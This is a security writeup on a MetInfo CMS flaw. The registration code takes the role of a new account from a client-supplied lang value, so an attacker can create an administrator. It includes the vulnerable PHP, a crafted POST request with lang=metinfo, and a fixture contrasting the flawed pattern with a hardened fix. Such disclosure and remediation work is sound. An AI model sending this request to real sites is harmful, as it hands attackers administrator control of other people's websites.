MetInfo latest version: design flaw allows registering an administrator account and getting a shell (getshell) directly from the back end

member/save.php
[php]
get_all($query);
$pass1=md5($mm);
// The role stored for the new account is $usertypes[0][id], i.e. the first row
// returned by the lookup below, not the usertype field sent in the request.
$query = "INSERT INTO $met_admin_table SET admin_id = '$yhid', admin_pass = '$pass1', admin_tel = '$lxdh', admin_email = '$email', admin_modify_ip = '$m_user_ip', admin_register_date= '$m_now_date', usertype = '{$usertypes[0][id]}', companyname = '$companyname', companyaddress = '$companyaddress', companyfax = '$companyfax', companycode = '$yzbm', companywebsite = '$wz', lang = '$lang', checkid = '$checkid'";
$db->query($query);
[/php]
In the database, usertype 3 is the administrator level. The usertype written by the INSERT above does not come from the usertype field of the request; it is the id of the first row returned by the following lookup, and that lookup is keyed on the client-supplied lang value:
[php]
// $lang is taken from the registration request
$query="select * from $met_admin_array where lang='$lang' order by user_webpower asc";
$usertypes=$db->get_all($query);
usertype = '{$usertypes[0][id]}'
[/php]
From the code it follows that when lang=metinfo, usertype=3.
[php]
POST /member/save.php?action=add HTTP/1.1
Host: 0day5.com

lang=metinfo&yhid=testtest&mm=testtest&mm1=testtest&email=byzhiwen%40vip.qq.com&companyname=ceshia&code=FE2B&lxdh=18210056765&companyfax=&companyaddress=nicai&yzbm=100001&usertype=3&wz=
[/php]
Intercept the registration request and change lang to metinfo.
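The flaw above is that the client chooses which row of the role table the registration code reads. The following is an added example written for this writeup, not MetInfo's own code: it reproduces that pattern against a constructed SQLite fixture and puts a hardened version beside it. The table and column names (met_admin_array, id, lang, user_webpower) come from the page; the PDO wiring, the fixture rows, the ordinary-member role id 1 and the public language list are assumptions.

```php
<?php
// Added example, not MetInfo's code. Reproduces the member/save.php pattern in
// which the new account's usertype is the id of the first met_admin_array row
// whose lang equals a client-supplied value, next to a hardened variant.
// Assumptions: PDO over in-memory SQLite, the fixture rows below, role id 1 as
// the ordinary-member role, and PUBLIC_LANGS as the site's visitor languages.

declare(strict_types=1);

// Vulnerable pattern: lang comes straight from the POST body, so the client
// decides which role row is read and therefore which usertype it receives.
function registrationUsertypeVulnerable(PDO $db, array $post): ?int
{
    $lang = (string) ($post['lang'] ?? '');
    $stmt = $db->prepare(
        'SELECT id FROM met_admin_array WHERE lang = :lang ORDER BY user_webpower ASC'
    );
    $stmt->execute([':lang' => $lang]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : (int) $row['id'];
}

// Hardened pattern: self-registration always receives one fixed, least-privilege
// role chosen on the server, and lang is whitelisted against the languages the
// site actually exposes to visitors. 'metinfo' is not in that list, so a tampered
// request can never reach the administrator row.
const SELF_REGISTER_USERTYPE = 1;        // assumed id of the ordinary-member role
const PUBLIC_LANGS = ['cn', 'en'];       // assumed list of site languages open to visitors

function registrationUsertypeHardened(array $post): int
{
    // $post is deliberately not consulted: the request has no say in the role.
    return SELF_REGISTER_USERTYPE;
}

function registrationLangHardened(array $post): string
{
    $lang = (string) ($post['lang'] ?? '');
    return in_array($lang, PUBLIC_LANGS, true) ? $lang : PUBLIC_LANGS[0];
}

// Constructed fixture (not real MetInfo data): an administrator role with id 3
// tagged lang 'metinfo', as the writeup describes, plus one ordinary-member role
// per public language.
function buildFixture(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE met_admin_array (id INTEGER PRIMARY KEY, lang TEXT NOT NULL, user_webpower TEXT NOT NULL)');
    $ins = $db->prepare('INSERT INTO met_admin_array (id, lang, user_webpower) VALUES (?, ?, ?)');
    $ins->execute([3, 'metinfo', '']);   // administrator level (usertype 3)
    foreach (PUBLIC_LANGS as $i => $lang) {
        $ins->execute([SELF_REGISTER_USERTYPE + $i, $lang, '']);
    }
    return $db;
}

// The request body from the writeup, with lang already changed to metinfo.
$post = [
    'lang'     => 'metinfo',
    'yhid'     => 'testtest',
    'mm'       => 'testtest',
    'mm1'      => 'testtest',
    'usertype' => '3',   // has no effect on either path; the role never comes from here
];

$db = buildFixture();
printf("vulnerable: usertype=%s\n", var_export(registrationUsertypeVulnerable($db, $post), true));
printf("hardened:   usertype=%d lang=%s\n", registrationUsertypeHardened($post), registrationLangHardened($post));
```

Run it with the PHP CLI (pdo_sqlite enabled). The vulnerable function resolves the tampered lang to the administrator row, while the hardened pair ignores the request for the role decision and falls back to the default language for the unknown lang value. The fix to look for in a patched install is exactly this separation: the role assigned at self-registration must be a server-side constant, and lang must be validated against the site's own language list before it is used in any lookup.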
